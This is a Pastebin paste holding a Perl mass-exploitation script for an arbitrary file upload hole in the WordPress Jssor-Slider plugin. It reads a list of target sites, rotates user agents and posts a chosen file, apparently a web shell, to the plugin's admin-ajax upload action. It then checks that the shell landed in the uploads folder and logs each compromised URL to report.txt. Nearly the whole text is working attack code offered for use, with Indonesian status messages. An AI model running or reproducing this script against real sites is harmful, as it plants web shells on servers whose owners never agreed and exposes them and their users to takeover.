SHARE
TWEET

WordPress Jssor-Slider Library Plugin Arbitrary Exploiter

a guest Jul 24th, 2019 80 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3.  
  4. my $datestring = localtime();
  5. ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
  6.  
  7. sub randomagent {
  8. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  9. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  10. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  11. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  12. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  13. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  14. );
  15. my $random = $array[rand @array];
  16. return($random);
  17. }
  18. flag();
  19. print "[+] Input List Target : ";
  20. chomp (my $list=<>);
  21. print "[+] Input File : ";
  22. chomp (my $file=<>);
  23. print "[+] Started : $datestring\n";
  24. open(my $arq,'<'.$list) || die($!);
  25. my @site = <$arq>;
  26. @site = grep { !/^$/ } @site;
  27. close($arq);
  28. print "[".($#site+1)."] URL to test upload\n\n";
  29. my $i;
  30. foreach my $web(@site){$i++;
  31.     chomp($web);
  32.     if($web !~ /^(http|https):\/\//){
  33.         $web = 'http://'.$web;
  34.     }
  35. print "[$i] $web \n";
  36. print "Check Shell: $web/wp-content/jssor-slider/jssor-uploads/".$file."\n";
  37. expqq($web);#exploiting website :)
  38. }
  39. sub expqq{
  40. my $useragent = randomagent();#Get a Random User Agent
  41. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
  42. $ua->timeout(10);
  43. $ua->agent($useragent);
  44. print "[Testing] Test Vuln \n";
  45. my $url = $_[0]."/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library";
  46. my $ss = $_[0]."/wp-content/jssor-slider/jssor-uploads/".$file;
  47. my $response = $ua->get($url);
  48.  
  49. if ($response->is_success || $response->content=~/error/){
  50.     print "[OK] Vuln\n";
  51.     print "[*] Sent payload\n";
  52.     my $regex = 'success';
  53.     my $body = $ua->post( $url,
  54.         Content_Type => 'form-data',
  55.         Content => [ 'file' => ["$file"] ]
  56.     );
  57.     if ($body->is_success || $body->content=~ /$regex/){
  58.         print "[+] Payload Berhasil executed\n";
  59.  
  60.         print "[*] Check jika shell sudah terupload\n\n";
  61.         my $res = $ua->get($ss);
  62.         if ($res->is_success){
  63.          
  64.                 print "[OK] Shell Sukses diupload \n";
  65.  
  66.                 my $ee = $ua->get($_[0]."/wp-content/jssor-slider/jssor-uploads/$file");
  67.                 print "\n[*] Website Info :\n";
  68.                 print "| ".$_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n\n";
  69.                  open(my $fh, '>>', 'report.txt');
  70.                 print $fh $_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n";
  71.                 close $fh;
  72.                 print "[*] Berhasil disimpan report.txt\n\n";
  73.          
  74.         }
  75.         else {print "[No] Gagal Upload Shell \n\n";}
  76.     }    
  77.     else {print "[No] Gagal Kirim Payload\n\n";}
  78. }
  79. else {print "[No] Gak Vuln\n\n";}
  80. }
  81. sub flag {print "\n[+] WordPress Jssor-Slider Library Plugin Arbitrary Exploiter \n[*] Coder => M-A | Recoded => Dx_Cyber\n(c) Janissaries.org, Sec4ever.com, Lokerilmu-it.blogspot.com\n\n";
  82. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top